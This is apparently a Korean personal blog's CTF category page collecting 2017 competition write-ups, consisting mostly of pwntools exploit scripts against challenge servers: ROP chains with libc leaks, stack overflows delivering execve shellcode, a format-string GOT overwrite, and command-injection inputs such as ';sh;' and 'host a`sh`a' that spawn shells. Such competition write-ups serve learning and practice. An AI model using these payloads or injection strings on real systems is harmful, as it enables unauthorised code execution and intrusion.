$bash

'0x0400 : Wargame/0x0410 : CTF'에 해당되는 글 8건

  1. samsung ctf - write up
  2. Security Fest 2017 CTF
  3. 2017 Hust CTF write up
  4. defcon2016 - [rev]baby-re
  5. RCTF - [misc]intoU
  6. DEFCON_2017 - SmashMe
  7. TAMU CTF - pwnable(1~4)
  8. Defcon 23 - babycmd

samsung ctf - write up

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

Security Fest 2017 CTF

0x0400 : Wargame/0x0410 : CTF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pwn import *
= remote("pwn2.ctf.rocks"3030)
 
def start():
    s.recvuntil("username: ")
    s.sendline("aaaa")
 
    s.recvuntil("#> ")
    s.sendline("1")
    s.recvuntil("address: ")
    s.sendline("123")
 
    s.recvuntil("#> ")
    s.sendline("3")
    s.recvuntil("Y/N?:")
    s.sendline("N")
 
def sh():
    s.recvuntil("username: ")
    s.sendline(";sh;")
 
    s.recvuntil("#> ")
    s.sendline("2")
    s.sendline("id")
 
if __name__ == '__main__':
    start()
    sh()
    s.interactive()
 
cs


pwnable - ping

// 커멘드 인젝션 탈출하고 난 뒤에 ;id; 로 우회 가능.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *
= remote("pwn.ctf.rocks"6666)
#s = process("./puzle")
 
def make_elf():
    date = ''
    s.recv(1024)
    s.sendline("1")
    s.recvuntil("[")
    date += s.recvuntil("]")
    while 1:
        s.recvuntil("#> ")
        s.sendline("2")
        #print s.recv(1024)
        s.recvuntil("[")
        date += s.recvuntil("]")
        print date
 
def system_leak():
    s.recvuntil("#> ")
    s.sendline("Z")
    s.recvuntil("address:")
    system = int(s.recv(1024).split()[0][:-1], 16)
    binsh = system + 0x146de7
    ppr = system - 0x203DE
 
    print hex(system)
    print hex(binsh)
    
    s.sendline("2")
    s.recvuntil("bytes: ")
    s.sendline("1337p0werOverWhelMing1337")
 
    pay  = "A"*40
    pay += p64(ppr)
    pay += p64(binsh) #rsi
    pay += p64(binsh) #rdi
 
    pay += "B"*0x58
    pay += p64(0#pop rbx
    pay += p64(0#pop rbp
    pay += p64(0#pop r12
    pay += p64(0#pop r13
    pay += p64(0#pop r14
    pay += p64(0#pop r15
    pay += p64(system) #ret
 
    s.recvuntil("now!:")
    s.sendline(pay)
 
 
if __name__ == '__main__':
    system_leak()
    s.interactive()
 
 
cs


pwnable - puzzle_palace

// make_elf 함수에서 elf 파일을 만들어서 rop 시키는 문제


+ braindump 문제는 샌드박스 brainfuck 문제.

++ misc 좀 이것저것 본건 많은데 중간에 귀찮고 졸려서 포기

'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

Security Fest 2017 CTF  (0) 2017.06.06
2017 Hust CTF write up  (0) 2017.05.28
defcon2016 - [rev]baby-re  (0) 2017.05.21
DEFCON_2017 - SmashMe  (0) 2017.05.08
TAMU CTF - pwnable(1~4)  (0) 2017.04.23
Defcon 23 - babycmd  (0) 2017.01.12

2017 Hust CTF write up

0x0400 : Wargame/0x0410 : CTF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from pwn import *
import sys
elf = ELF("./attackme")
#libc = ELF("libc-2.23.so")
pop3ret = 0x80485f9
pop2ret = 0x80485fa
 
if sys.argv[1== "1":
    s = remote("223.194.105.182"37100)
elif sys.argv[1== "0":
    s = process("./attackme")
 
def leak():
    s.recvuntil("Press any thing\n")
    
    pay  = "A"*104
    pay += p32(elf.plt['write'])
    pay += p32(pop3ret)
    pay += p32(1)
    pay += p32(elf.got['write'])
    pay += p32(4)
 
    pay += p32(0x0804852B)
    pay += p32(0)
 
    s.sendline(pay)
 
    s.recv(113)
    write_add = u32(s.recv(4))
    s.recvuntil("Press any thing\n")
    sh_add = write_add + 0x85E3B
    system_add = write_add - 0x9AC50
    log.info("write_add  : "+hex(write_add))
    log.info("sh_add   : "+hex(sh_add))
    log.info("system_add : "+hex(system_add))
 
    pay1  = "A"*104
    pay1 += p32(system_add)
    pay1 += p32(0)
    pay1 += p32(sh_add)
 
    s.sendline(pay1)
    s.interactive()
 
if __name__ == '__main__':
    leak()
 
 
cs


pwnable - RR2L(50p)



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
import sys
 
if sys.argv[1== "1":
    s = remote("223.194.105.182"22901)
elif sys.argv[1== "0":
    s = process("./wind")
 
def start():
    log.info("Wind Start func!")
    #s.recv(1024)
    s.recvuntil("[+] INPUT: ")
 
    pay  = "A"*32
    pay += p32(0x080487F9)
 
    s.sendline(pay)
 
if __name__ == '__main__':
    start()
    s.interactive()
 
cs


pwnable - Wind(100p)



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
#s = process('./challenge')
= remote('223.194.105.182'29001)
elf = ELF("./challenge")
payload  = 'A'*200
#payload += p32(0x08048980)
s.sendline(payload)
 
s.recv(1024)
pay1  = "A"*204
pay1 += p32(0)
pay1 += p32(0x00020f31)
pay1 += "B"*192
pay1 += p32(0x08048986)
s.sendline(pay1)
s.interactive()
 
 
cs


pwnable - heap(100p)


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
import time
= remote('223.194.105.182'41001)
s.recv(1024)
 
payload = 'A'*24 + p32(0x080483e3+ p32(0x0804a00c)
s.sendline(payload)
 
leaked = u32(s.recv(4)) - 0x18540
system_libc = leaked + 0x3ada0
binsh = leaked + 0x15b82b
 
payload_1 = 'A'*24 + p32(0x08048296)*4 + p32(system_libc) + 'AAAA' + p32(binsh)
s.sendline(payload_1)
 
s.interactive()
cs


pwnable - ohmybof(100p)



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
 
#s = process("./earth")
= remote("223.194.105.182"22900)
 
shellcode = "\xda\xd4\xba\x11\xf2\x16\x5f\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x0d\x31\x56\x18\x03\x56\x18\x83\xee\xed\x10\xe3\x35\x06\x8d\x95\x98\x7e\x45\x8b\x7f\xf7\x72\xbb\x50\x74\x15\x3c\xc7\x55\x87\x55\x79\x20\xa4\xf4\x6d\x3c\x2b\xf9\x6d\x6f\x49\x90\x03\x40\xee\x03\xa8\xbe\x96\xaf\x31\xd9\x56\x67\xe1\xac\xb6\x4a\x85\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
 
payload = "A" * 0x6c
payload += "BBBB"
payload += p32(0xbfffec3c + 200)
payload += "\x90" * 2000
payload += shellcode
 
s.sendline(payload)
s.interactive()
 
 
cs


pwnable - earth(100p)




pwnable - shellwedance(300p)

// 그냥 인젝션 문제


misc 한문제를 또 봤는데 그건 그냥 import OS 되서 패스,,,,샌드박스 문제인데 필터링이 없다.


200점 짜리 ROP인가..무튼 너무 파일이 더러웠따,,,,공부하다가 stripped 라는 것도 알게되서 한번 관련 문제 리버싱인거 같지만 봐야될듯.

'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

Security Fest 2017 CTF  (0) 2017.06.06
2017 Hust CTF write up  (0) 2017.05.28
defcon2016 - [rev]baby-re  (0) 2017.05.21
DEFCON_2017 - SmashMe  (0) 2017.05.08
TAMU CTF - pwnable(1~4)  (0) 2017.04.23
Defcon 23 - babycmd  (0) 2017.01.12

defcon2016 - [rev]baby-re

0x0400 : Wargame/0x0410 : CTF
1
2
3
4
5
6
7
8
import angr
 
proj = angr.Project("./baby-re", load_options={'auto_load_libs':False})
path_group = proj.factory.path_group(threads=4)
path_group.explore(find=0x40294b, avoid=0x402941)
print path_group.found[0].state.posix.dumps(1)
 
 
cs



path_group.explore(find=0x40294b, avoid=0x402941) 는 0x40294b로 가는대 0x402941 여기를 피해 가라는 의미이다.



'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

Security Fest 2017 CTF  (0) 2017.06.06
2017 Hust CTF write up  (0) 2017.05.28
defcon2016 - [rev]baby-re  (0) 2017.05.21
DEFCON_2017 - SmashMe  (0) 2017.05.08
TAMU CTF - pwnable(1~4)  (0) 2017.04.23
Defcon 23 - babycmd  (0) 2017.01.12

RCTF - [misc]intoU

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

DEFCON_2017 - SmashMe

0x0400 : Wargame/0x0410 : CTF
1
2
3
4
5
6
7
8
9
10
11
from pwn import *
= remote("smashme_omgbabysfirst.quals.shallweplayage.me"57348)
s.recv(1024)
 
payload  = "\x90"*6
payload += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 
# shellcode 27bit
payload += "smash me outside how bout dAAAAAAAAAAA"
payload += "\x1b\x4e\x4c"
 
s.sendline(payload)
s.interactive()
cs


'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

Security Fest 2017 CTF  (0) 2017.06.06
2017 Hust CTF write up  (0) 2017.05.28
defcon2016 - [rev]baby-re  (0) 2017.05.21
DEFCON_2017 - SmashMe  (0) 2017.05.08
TAMU CTF - pwnable(1~4)  (0) 2017.04.23
Defcon 23 - babycmd  (0) 2017.01.12

TAMU CTF - pwnable(1~4)

0x0400 : Wargame/0x0410 : CTF

pwn 1 


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
from time import *
 
context(arch='i386', os='linux')
= remote('pwn.ctf.tamu.edu'4322)
 
flag = 0xCA11AB1E
payload  = 'a'*0x1b
payload += p32(flag)
 
r.sendline(payload)
 
print r.recv(1024)
sleep(0.3)
 
 
cs


pwn 2

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
= remote("pwn.ctf.tamu.edu",4321)
elf = ELF("./pwn2")
 
flag = 0x0804854B
 
payload  = "A"*140
payload += p32(flag)
 
s.sendline(payload)
print s.recv(1024)
 
 
cs

pwn 3


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
from time import *
 
= remote("pwn.ctf.tamu.edu"4323)
= process('./pwn3')
 
exit_got = 0x804a01c
print_flag = 0x80485ab - 4
 
payload  = p32(exit_got)
payload += '%%%dx' % print_flag
payload += '%%%d$n' % 4
 
 
print s.recvuntil('Enter a word to be echoed:')
s.sendline(payload)
print s.recvuntil('This function has been deprecated')
 
flag = s.recv(1024)
print flag
 
# 3번은..그냥 (python ~~~ |cat --) | nc 로 해결.
# 익스 코드는 payload를 가지고 gdb 에서 검증.
 
cs

pwn 4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
= remote("web.ctf.tamu.edu",4324)
#s.recvuntil("I require an input:")
 
sys = 0x80484d9 # <flag_func+14>
flag = 0x0804A028 # string meun
 
payload  = "A"*16
payload += p32(sys)
payload += p32(flag)
 
s.sendline(payload)
print s.recv(1024)
 
cs


'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

Security Fest 2017 CTF  (0) 2017.06.06
2017 Hust CTF write up  (0) 2017.05.28
defcon2016 - [rev]baby-re  (0) 2017.05.21
DEFCON_2017 - SmashMe  (0) 2017.05.08
TAMU CTF - pwnable(1~4)  (0) 2017.04.23
Defcon 23 - babycmd  (0) 2017.01.12

Defcon 23 - babycmd

0x0400 : Wargame/0x0410 : CTF

┌─[b4sh5i@ubuntu] - [~/Downloads/defcon/2015/babycmd] - [Thu Jan 12, 15:33]

└─[$] <> ./babycmd 


Welcome to another Baby's First Challenge!

Commands: ping, dig, host, exit

: host a`sh`a

id

cat flag

exit

host: 'auid=1000(b4sh5i) gid=1000(b4sh5i) groups=1000(b4sh5i),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)

FLAG{flag_Is_ang_Gim0_D}a' is not in legal name syntax (label too long)

Commands: ping, dig, host, exit

'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

Security Fest 2017 CTF  (0) 2017.06.06
2017 Hust CTF write up  (0) 2017.05.28
defcon2016 - [rev]baby-re  (0) 2017.05.21
DEFCON_2017 - SmashMe  (0) 2017.05.08
TAMU CTF - pwnable(1~4)  (0) 2017.04.23
Defcon 23 - babycmd  (0) 2017.01.12